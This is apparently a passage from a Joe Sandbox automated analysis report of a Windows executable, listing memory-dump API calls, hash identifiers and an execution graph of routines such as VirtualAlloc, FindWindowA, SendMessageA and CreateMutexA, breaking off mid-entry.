                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CommandHandleLineModule
                                                                          • String ID: U1hd.@$`&\
                                                                          • API String ID: 2123368496-962632401
                                                                          • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                          • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                          • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                          • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID:
                                                                          • API String ID: 730355536-0
                                                                          • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                          • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                          • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                          • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue
                                                                          • String ID: )q@
                                                                          • API String ID: 3660427363-2284170586
                                                                          • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                          • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                          • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                          • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                          APIs
                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastSleep
                                                                          • String ID:
                                                                          • API String ID: 1458359878-0
                                                                          • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                          • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                          • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                          • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                          Execution Graph

                                                                          Execution Coverage:14.3%
                                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                                          Signature Coverage:4.4%
                                                                          Total number of Nodes:2000
                                                                          Total number of Limit Nodes:87
                                                                          execution_graph 52433 2301070 52434 230107c 52433->52434 52436 2301084 52433->52436 52435 2301092 52436->52435 52439 45cff4 52436->52439 52440 45d003 52439->52440 52441 45d037 VirtualAlloc 52440->52441 52445 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52440->52445 52443 45d04f 52441->52443 52444 45d032 52444->52441 52445->52444 52446 40cf00 52447 40cf12 52446->52447 52448 40cf0d 52446->52448 52450 406f50 CloseHandle 52448->52450 52450->52447 52451 402584 52452 402598 52451->52452 52453 4025ab 52451->52453 52481 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 52452->52481 52454 4025c2 RtlEnterCriticalSection 52453->52454 52455 4025cc 52453->52455 52454->52455 52467 4023b4 13 API calls 52455->52467 52457 40259d 52457->52453 52459 4025a1 52457->52459 52460 4025d5 52461 4025d9 52460->52461 52468 402088 52460->52468 52463 402635 52461->52463 52464 40262b RtlLeaveCriticalSection 52461->52464 52464->52463 52465 4025e5 52465->52461 52482 402210 9 API calls 52465->52482 52467->52460 52469 40209c 52468->52469 52470 4020af 52468->52470 52489 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 52469->52489 52472 4020d0 52470->52472 52473 4020c6 RtlEnterCriticalSection 52470->52473 52478 402106 52472->52478 52483 401f94 52472->52483 52473->52472 52474 4020a1 52474->52470 52475 4020a5 52474->52475 52475->52478 52478->52465 52479 4021f1 RtlLeaveCriticalSection 52480 4021fb 52479->52480 52480->52465 52481->52457 52482->52461 52486 401fa4 52483->52486 52484 401fd0 52488 401ff4 52484->52488 52495 401db4 52484->52495 52486->52484 52486->52488 52490 401f0c 52486->52490 52488->52479 52488->52480 52489->52474 52499 40178c 52490->52499 52494 401f29 52494->52486 52496 401dd2 52495->52496 52497 401e02 52495->52497 52496->52488 52497->52496 52522 401d1c 52497->52522 52500 4017a8 52499->52500 52502 4017b2 52500->52502 52504 40180f 52500->52504 52507 401803 52500->52507 52510 4014e4 52500->52510 52519 4013e0 LocalAlloc 52500->52519 52518 401678 VirtualAlloc 52502->52518 52504->52494 52509 401e80 9 API calls 52504->52509 52506 4017be 52506->52504 52520 4015c0 VirtualFree 52507->52520 52509->52494 52511 4014f3 VirtualAlloc 52510->52511 52513 401520 52511->52513 52514 401543 52511->52514 52521 401398 LocalAlloc 52513->52521 52514->52500 52516 40152c 52516->52514 52517 401530 VirtualFree 52516->52517 52517->52514 52518->52506 52519->52500 52520->52504 52521->52516 52523 401d2e 52522->52523 52524 401d51 52523->52524 52525 401d63 52523->52525 52535 401940 52524->52535 52527 401940 3 API calls 52525->52527 52528 401d61 52527->52528 52529 401d79 52528->52529 52545 401bf8 9 API calls 52528->52545 52529->52496 52531 401d88 52532 401da2 52531->52532 52546 401c4c 9 API calls 52531->52546 52547 401454 LocalAlloc 52532->52547 52536 401966 52535->52536 52544 4019bf 52535->52544 52548 40170c 52536->52548 52540 401983 52542 40199a 52540->52542 52553 4015c0 VirtualFree 52540->52553 52542->52544 52554 401454 LocalAlloc 52542->52554 52544->52528 52545->52531 52546->52532 52547->52529 52551 401743 52548->52551 52549 401783 52552 4013e0 LocalAlloc 52549->52552 52550 40175d VirtualFree 52550->52551 52551->52549 52551->52550 52552->52540 52553->52542 52554->52544 58648 49706c 58706 403344 58648->58706 58650 49707a 58709 4056a0 58650->58709 58652 49707f 58712 406334 GetModuleHandleA GetProcAddress 58652->58712 58658 49708e 58729 410964 58658->58729 58660 497093 58733 412938 58660->58733 58979 4032fc 58706->58979 58708 403349 GetModuleHandleA GetCommandLineA 58708->58650 58711 4056db 58709->58711 58980 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58709->58980 58711->58652 58713 406350 58712->58713 58714 406357 GetProcAddress 58712->58714 58713->58714 58715 406366 58714->58715 58716 40636d GetProcAddress 58714->58716 58715->58716 58717 406380 58716->58717 58718 40637c SetProcessDEPPolicy 58716->58718 58719 409954 58717->58719 58718->58717 58981 40902c 58719->58981 58724 408728 7 API calls 58725 409977 58724->58725 58996 409078 GetVersionExA 58725->58996 58728 409b88 6F541CD0 58728->58658 58730 41096e 58729->58730 58731 4109ad GetCurrentThreadId 58730->58731 58732 4109c8 58731->58732 58732->58660 58998 40af0c 58733->58998 58737 412964 58979->58708 58980->58711 58982 408cc4 5 API calls 58981->58982 58983 40903d 58982->58983 58984 4085e4 GetSystemDefaultLCID 58983->58984 58988 40861a 58984->58988 58985 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 58985->58988 58986 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58986->58988 58987 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 58987->58988 58988->58985 58988->58986 58988->58987 58989 40867c 58988->58989 58990 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58989->58990 58991 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 58989->58991 58992 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 58989->58992 58993 4086ff 58989->58993 58990->58989 58991->58989 58992->58989 58994 403420 4 API calls 58993->58994 58995 408719 58994->58995 58995->58724 58997 40908f 58996->58997 58997->58728 59000 40af13 58998->59000 58999 40af32 59002 41101c 58999->59002 59000->58999 59009 40ae44 19 API calls 59000->59009 59003 41103e 59002->59003 59004 406df4 5 API calls 59003->59004 59005 403450 4 API calls 59003->59005 59006 41105d 59003->59006 59004->59003 59005->59003 59007 403400 4 API calls 59006->59007 59008 411072 59007->59008 59008->58737 59009->59000 60347 41ee64 60348 41ee73 IsWindowVisible 60347->60348 60349 41eea9 60347->60349 60348->60349 60350 41ee7d IsWindowEnabled 60348->60350 60350->60349 60351 41ee87 60350->60351 60352 402648 4 API calls 60351->60352 60353 41ee91 EnableWindow 60352->60353 60353->60349 60354 41fb68 60355 41fb71 60354->60355 60358 41fe0c 60355->60358 60357 41fb7e 60359 41fefe 60358->60359 60360 41fe23 60358->60360 60359->60357 60360->60359 60379 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 60360->60379 60362 41fe59 60363 41fe83 60362->60363 60364 41fe5d 60362->60364 60389 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 60363->60389 60380 41fbac 60364->60380 60367 41fe91 60369 41fe95 60367->60369 60370 41febb 60367->60370 60372 41fbac 10 API calls 60369->60372 60373 41fbac 10 API calls 60370->60373 60371 41fbac 10 API calls 60374 41fe81 60371->60374 60375 41fea7 60372->60375 60376 41fecd 60373->60376 60374->60357 60377 41fbac 10 API calls 60375->60377 60378 41fbac 10 API calls 60376->60378 60377->60374 60378->60374 60379->60362 60381 41fbc7 60380->60381 60382 41fbdd 60381->60382 60383 41f94c 4 API calls 60381->60383 60390 41f94c 60382->60390 60383->60382 60385 41fc25 60386 41fc48 SetScrollInfo 60385->60386 60398 41faac 60386->60398 60389->60367 60391 4181f0 60390->60391 60392 41f969 GetWindowLongA 60391->60392 60393 41f9a6 60392->60393 60394 41f986 60392->60394 60410 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 60393->60410 60409 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 60394->60409 60397 41f992 60397->60385 60399 41faba 60398->60399 60400 41fac2 60398->60400 60399->60371 60401 41fb01 60400->60401 60402 41faf1 60400->60402 60408 41faff 60400->60408 60412 417e58 IsWindowVisible ScrollWindow SetWindowPos 60401->60412 60411 417e58 IsWindowVisible ScrollWindow SetWindowPos 60402->60411 60405 41fb41 GetScrollPos 60405->60399 60406 41fb4c 60405->60406 60407 41fb5b SetScrollPos 60406->60407 60407->60399 60408->60405 60409->60397 60410->60397 60411->60408 60412->60408 60413 4205a8 60414 4205bb 60413->60414 60434 415b40 60414->60434 60416 420702 60417 420719 60416->60417 60441 4146e4 KiUserCallbackDispatcher 60416->60441 60418 420730 60417->60418 60442 414728 KiUserCallbackDispatcher 60417->60442 60424 420752 60418->60424 60443 420070 12 API calls 60418->60443 60419 420661 60439 420858 20 API calls 60419->60439 60420 4205f6 60420->60416 60420->60419 60427 420652 MulDiv 60420->60427 60425 42067a 60425->60416 60440 420070 12 API calls 60425->60440 60438 41a314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 60427->60438 60430 420697 60431 4206b3 MulDiv 60430->60431 60432 4206d6 60430->60432 60431->60432 60432->60416 60433 4206df MulDiv 60432->60433 60433->60416 60435 415b52 60434->60435 60444 414480 60435->60444 60437 415b6a 60437->60420 60438->60419 60439->60425 60440->60430 60441->60417 60442->60418 60443->60424 60445 41449a 60444->60445 60448 410658 60445->60448 60447 4144b0 60447->60437 60451 40dea4 60448->60451 60450 41065e 60450->60447 60452 40df06 60451->60452 60453 40deb7 60451->60453 60458 40df14 60452->60458 60456 40df14 19 API calls 60453->60456 60457 40dee1 60456->60457 60457->60450 60459 40df24 60458->60459 60461 40df3a 60459->60461 60470 40d7e0 60459->60470 60490 40e29c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60459->60490 60473 40e14c 60461->60473 60464 40d7e0 5 API calls 60465 40df42 60464->60465 60465->60464 60466 40dfae 60465->60466 60476 40dd60 60465->60476 60468 40e14c 5 API calls 60466->60468 60469 40df10 60468->60469 60469->60450 60491 40ec08 60470->60491 60499 40d6bc 60473->60499 60477 40e154 5 API calls 60476->60477 60478 40dd93 60477->60478 60479 40eb6c 5 API calls 60478->60479 60480 40dd9e 60479->60480 60481 40eb6c 5 API calls 60480->60481 60482 40dda9 60481->60482 60483 40ddc4 60482->60483 60484 40ddbb 60482->60484 60489 40ddc1 60482->60489 60508 40dbd8 60483->60508 60511 40dcc8 19 API calls 60484->60511 60487 403420 4 API calls 60488 40de8f 60487->60488 60488->60465 60489->60487 60490->60459 60494 40d980 60491->60494 60496 40d98b 60494->60496 60495 40d7ea 60495->60459 60496->60495 60498 40d9cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60496->60498 60498->60496 60500 40ec08 5 API calls 60499->60500 60501 40d6c9 60500->60501 60502 40d6dc 60501->60502 60506 40ed0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60501->60506 60502->60465 60504 40d6d7 60507 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60504->60507 60506->60504 60507->60502 60512 40ad7c 19 API calls 60508->60512 60510 40dc00 60510->60489 60511->60489 60512->60510 60513 440be8 60514 440bf1 60513->60514 60515 440bff WriteFile 60513->60515 60514->60515 60516 440c0a 60515->60516 52555 41364c SetWindowLongA GetWindowLongA 52556 4136a9 SetPropA SetPropA 52555->52556 52557 41368b GetWindowLongA 52555->52557 52561 41f3ac 52556->52561 52557->52556 52558 41369a SetWindowLongA 52557->52558 52558->52556 52566 415280 52561->52566 52573 423c1c 52561->52573 52667 423a94 52561->52667 52562 4136f9 52567 41528d 52566->52567 52568 4152f3 52567->52568 52569 4152e8 52567->52569 52572 4152f1 52567->52572 52674 424b9c 13 API calls 52568->52674 52569->52572 52675 41506c 46 API calls 52569->52675 52572->52562 52576 423c52 52573->52576 52594 423c73 52576->52594 52676 423b78 52576->52676 52577 423cfc 52579 423d03 52577->52579 52580 423d37 52577->52580 52578 423c9d 52581 423ca3 52578->52581 52582 423d60 52578->52582 52589 423d09 52579->52589 52626 423fc1 52579->52626 52585 423d42 52580->52585 52586 4240aa IsIconic 52580->52586 52583 423cd5 52581->52583 52584 423ca8 52581->52584 52587 423d72 52582->52587 52588 423d7b 52582->52588 52583->52594 52615 423cee 52583->52615 52616 423e4f 52583->52616 52590 423e06 52584->52590 52591 423cae 52584->52591 52592 4240e6 52585->52592 52593 423d4b 52585->52593 52586->52594 52598 4240be GetFocus 52586->52598 52595 423d88 52587->52595 52596 423d79 52587->52596 52691 4241a4 11 API calls 52588->52691 52599 423f23 SendMessageA 52589->52599 52600 423d17 52589->52600 52704 423b94 NtdllDefWindowProc_A 52590->52704 52601 423cb7 52591->52601 52602 423e2e PostMessageA 52591->52602 52724 424860 WinHelpA PostMessageA 52592->52724 52605 4240fd 52593->52605 52624 423cd0 52593->52624 52594->52562 52692 4241ec IsIconic 52595->52692 52700 423b94 NtdllDefWindowProc_A 52596->52700 52598->52594 52607 4240cf 52598->52607 52599->52594 52600->52594 52600->52624 52645 423f66 52600->52645 52610 423cc0 52601->52610 52611 423eb5 52601->52611 52710 423b94 NtdllDefWindowProc_A 52602->52710 52613 424106 52605->52613 52614 42411b 52605->52614 52723 41f004 GetCurrentThreadId 73A15940 52607->52723 52619 423cc9 52610->52619 52620 423dde IsIconic 52610->52620 52621 423ebe 52611->52621 52622 423eef 52611->52622 52612 423e49 52612->52594 52725 4244e4 52613->52725 52731 42453c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 52614->52731 52615->52624 52625 423e1b 52615->52625 52680 423b94 NtdllDefWindowProc_A 52616->52680 52618 4240d6 52618->52594 52629 4240de SetFocus 52618->52629 52619->52624 52630 423da1 52619->52630 52632 423dfa 52620->52632 52633 423dee 52620->52633 52631 423b24 5 API calls 52621->52631 52687 423b94 NtdllDefWindowProc_A 52622->52687 52624->52594 52690 423b94 NtdllDefWindowProc_A 52624->52690 52705 424188 52625->52705 52626->52594 52639 423fe7 IsWindowEnabled 52626->52639 52629->52594 52630->52594 52701 422c5c ShowWindow PostMessageA PostQuitMessage 52630->52701 52638 423ec6 52631->52638 52703 423b94 NtdllDefWindowProc_A 52632->52703 52702 423bd0 15 API calls 52633->52702 52637 423e55 52643 423e93 52637->52643 52644 423e71 52637->52644 52649 423ed8 52638->52649 52711 41ef68 52638->52711 52639->52594 52650 423ff5 52639->52650 52642 423ef5 52651 423f0d 52642->52651 52688 41eeb4 GetCurrentThreadId 73A15940 52642->52688 52647 423a94 6 API calls 52643->52647 52681 423b24 52644->52681 52645->52594 52652 423f88 IsWindowEnabled 52645->52652 52654 423e9b PostMessageA 52647->52654 52717 423b94 NtdllDefWindowProc_A 52649->52717 52660 423ffc IsWindowVisible 52650->52660 52658 423a94 6 API calls 52651->52658 52652->52594 52659 423f96 52652->52659 52654->52594 52658->52594 52718 412320 7 API calls 52659->52718 52660->52594 52662 42400a GetFocus 52660->52662 52719 4181f0 52662->52719 52664 42401f SetFocus 52721 415250 52664->52721 52668 423b1d 52667->52668 52669 423aa4 52667->52669 52668->52562 52669->52668 52670 423aaa EnumWindows 52669->52670 52670->52668 52671 423ac6 GetWindow GetWindowLongA 52670->52671 52863 423a2c GetWindow 52670->52863 52672 423ae5 52671->52672 52672->52668 52673 423b11 SetWindowPos 52672->52673 52673->52668 52673->52672 52674->52572 52675->52572 52677 423b82 52676->52677 52678 423b8d 52676->52678 52677->52678 52732 408728 GetSystemDefaultLCID 52677->52732 52678->52577 52678->52578 52680->52637 52682 423b72 PostMessageA 52681->52682 52683 423b33 52681->52683 52682->52594 52683->52682 52684 423b6a 52683->52684 52686 423b5e SetWindowPos 52683->52686 52835 40b3d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52684->52835 52686->52683 52686->52684 52687->52642 52689 41ef39 52688->52689 52689->52651 52690->52594 52691->52594 52693 4241fd SetActiveWindow 52692->52693 52697 424233 52692->52697 52836 42365c 52693->52836 52696 423b24 5 API calls 52698 42421a 52696->52698 52697->52594 52698->52697 52699 42422d SetFocus 52698->52699 52699->52697 52700->52594 52701->52594 52702->52594 52703->52594 52704->52594 52848 41db40 52705->52848 52708 4241a0 52708->52594 52709 424194 LoadIconA 52709->52708 52710->52612 52712 41ef70 IsWindow 52711->52712 52713 41ef9c 52711->52713 52714 41ef7f EnableWindow 52712->52714 52716 41ef8a 52712->52716 52713->52649 52714->52716 52715 402660 4 API calls 52715->52716 52716->52712 52716->52713 52716->52715 52717->52594 52718->52594 52720 4181fa 52719->52720 52720->52664 52722 41526b SetFocus 52721->52722 52722->52594 52723->52618 52724->52612 52726 4244f0 52725->52726 52727 42450a 52725->52727 52728 4244f7 SendMessageA 52726->52728 52730 42451f 52726->52730 52729 402648 4 API calls 52727->52729 52728->52730 52729->52730 52730->52594 52731->52612 52787 408570 GetLocaleInfoA 52732->52787 52737 408570 5 API calls 52738 40877d 52737->52738 52739 408570 5 API calls 52738->52739 52740 4087a1 52739->52740 52799 4085bc GetLocaleInfoA 52740->52799 52743 4085bc GetLocaleInfoA 52744 4087d1 52743->52744 52745 408570 5 API calls 52744->52745 52746 4087eb 52745->52746 52747 4085bc GetLocaleInfoA 52746->52747 52748 408808 52747->52748 52749 408570 5 API calls 52748->52749 52750 408822 52749->52750 52751 403450 4 API calls 52750->52751 52752 40882f 52751->52752 52753 408570 5 API calls 52752->52753 52754 408844 52753->52754 52755 403450 4 API calls 52754->52755 52756 408851 52755->52756 52757 4085bc GetLocaleInfoA 52756->52757 52758 40885f 52757->52758 52759 408570 5 API calls 52758->52759 52760 408879 52759->52760 52761 403450 4 API calls 52760->52761 52762 408886 52761->52762 52763 408570 5 API calls 52762->52763 52764 40889b 52763->52764 52765 403450 4 API calls 52764->52765 52788 408597 52787->52788 52789 4085a9 52787->52789 52815 4034e0 52788->52815 52791 403494 4 API calls 52789->52791 52792 4085a7 52791->52792 52793 403450 52792->52793 52794 403454 52793->52794 52797 403464 52793->52797 52796 4034bc 4 API calls 52794->52796 52794->52797 52795 403490 52795->52737 52796->52797 52797->52795 52830 402660 52797->52830 52800 4085d8 52799->52800 52800->52743 52820 4034bc 52815->52820 52817 4034f0 52818 403400 4 API calls 52817->52818 52819 403508 52818->52819 52819->52792 52821 4034c0 52820->52821 52822 4034dc 52820->52822 52825 402648 52821->52825 52822->52817 52824 4034c9 52824->52817 52826 40264c 52825->52826 52827 402656 52825->52827 52826->52827 52829 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52826->52829 52827->52824 52827->52827 52829->52827 52831 402664 52830->52831 52832 40266e 52830->52832 52831->52832 52834 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52831->52834 52832->52795 52832->52832 52834->52832 52835->52682 52844 423608 SystemParametersInfoA 52836->52844 52839 423675 ShowWindow 52841 423680 52839->52841 52842 423687 52839->52842 52847 423638 SystemParametersInfoA 52841->52847 52842->52696 52845 423626 52844->52845 52845->52839 52846 423638 SystemParametersInfoA 52845->52846 52846->52839 52847->52842 52851 41db64 52848->52851 52852 41db4a 52851->52852 52853 41db71 52851->52853 52852->52708 52852->52709 52853->52852 52860 40cc80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 52853->52860 52855 41db8e 52855->52852 52856 41dba8 52855->52856 52857 41db9b 52855->52857 52861 41bd9c 11 API calls 52856->52861 52862 41b398 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 52857->52862 52860->52855 52861->52852 52862->52852 52864 423a4d GetWindowLongA 52863->52864 52865 423a59 52863->52865 52864->52865 52866 490c98 52867 490ccc 52866->52867 52868 490cce 52867->52868 52869 490ce2 52867->52869 53012 4467f0 18 API calls 52868->53012 52872 490d1e 52869->52872 52873 490cf1 52869->52873 52871 490cd7 Sleep 52933 490d55 52871->52933 52878 490d5a 52872->52878 52879 490d2d 52872->52879 52875 44684c 18 API calls 52873->52875 52877 490d00 52875->52877 52881 490d08 FindWindowA 52877->52881 52884 490d69 52878->52884 52885 490db0 52878->52885 53002 44684c 52879->53002 52883 446acc 5 API calls 52881->52883 52882 490d3a 52886 490d42 FindWindowA 52882->52886 52913 490d19 52883->52913 53013 4467f0 18 API calls 52884->53013 52890 490e0c 52885->52890 52891 490dbf 52885->52891 53006 446acc 52886->53006 52889 490d75 53014 4467f0 18 API calls 52889->53014 52898 490e1b 52890->52898 52904 490e68 52890->52904 53017 4467f0 18 API calls 52891->53017 52893 490d82 53015 4467f0 18 API calls 52893->53015 52896 490dcb 53018 4467f0 18 API calls 52896->53018 52897 490d8f 53016 4467f0 18 API calls 52897->53016 53022 4467f0 18 API calls 52898->53022 52902 490dd8 53019 4467f0 18 API calls 52902->53019 52903 490d9a SendMessageA 52908 446acc 5 API calls 52903->52908 52909 490ea2 52904->52909 52910 490e77 52904->52910 52905 490e27 53023 4467f0 18 API calls 52905->53023 52907 490de5 53020 4467f0 18 API calls 52907->53020 52908->52913 52919 490eb1 52909->52919 52920 490ef0 52909->52920 52914 44684c 18 API calls 52910->52914 52913->52933 52917 490e84 52914->52917 52915 490e34 53024 4467f0 18 API calls 52915->53024 52916 490df0 PostMessageA 53021 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52916->53021 52924 490e8c RegisterClipboardFormatA 52917->52924 53027 4467f0 18 API calls 52919->53027 52931 490eff 52920->52931 52932 490f44 52920->52932 52922 490e41 53025 4467f0 18 API calls 52922->53025 52928 446acc 5 API calls 52924->52928 52926 490e4c SendNotifyMessageA 53026 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52926->53026 52927 490ebd 53028 4467f0 18 API calls 52927->53028 52928->52933 53030 4467f0 18 API calls 52931->53030 52939 490f98 52932->52939 52940 490f53 52932->52940 53052 403420 52933->53052 52934 490eca 53029 4467f0 18 API calls 52934->53029 52937 490f0b 53031 4467f0 18 API calls 52937->53031 52938 490ed5 SendMessageA 52943 446acc 5 API calls 52938->52943 52948 490ffa 52939->52948 52949 490fa7 52939->52949 53034 4467f0 18 API calls 52940->53034 52942 490f18 53032 4467f0 18 API calls 52942->53032 52943->52913 52946 490f5f 53035 4467f0 18 API calls 52946->53035 52947 490f23 PostMessageA 53033 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52947->53033 52956 491009 52948->52956 52957 491081 52948->52957 52952 44684c 18 API calls 52949->52952 52954 490fb4 52952->52954 52953 490f6c 53036 4467f0 18 API calls 52953->53036 53038 42e2bc SetErrorMode 52954->53038 52960 44684c 18 API calls 52956->52960 52967 491090 52957->52967 52968 4910b6 52957->52968 52959 490f77 SendNotifyMessageA 53037 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52959->53037 52963 491018 52960->52963 52961 490fc1 52964 490fd7 GetLastError 52961->52964 52965 490fc7 52961->52965 53041 4467f0 18 API calls 52963->53041 52969 446acc 5 API calls 52964->52969 52966 446acc 5 API calls 52965->52966 52970 490fd5 52966->52970 53046 4467f0 18 API calls 52967->53046 52975 4910e8 52968->52975 52976 4910c5 52968->52976 52969->52970 52974 446acc 5 API calls 52970->52974 52973 49109a FreeLibrary 53047 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52973->53047 52974->52933 52985 4910f7 52975->52985 52991 49112b 52975->52991 52979 44684c 18 API calls 52976->52979 52977 49102b GetProcAddress 52980 491071 52977->52980 52981 491037 52977->52981 52982 4910d1 52979->52982 53045 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52980->53045 53042 4467f0 18 API calls 52981->53042 52987 4910d9 CreateMutexA 52982->52987 53048 48ae84 18 API calls 52985->53048 52986 491043 53043 4467f0 18 API calls 52986->53043 52987->52933 52990 491050 52994 446acc 5 API calls 52990->52994 52991->52933 53050 48ae84 18 API calls 52991->53050 52993 491103 52995 491114 OemToCharBuffA 52993->52995 52996 491061 52994->52996 53049 48ae9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52995->53049 53044 446924 LocalAlloc TlsSetValue 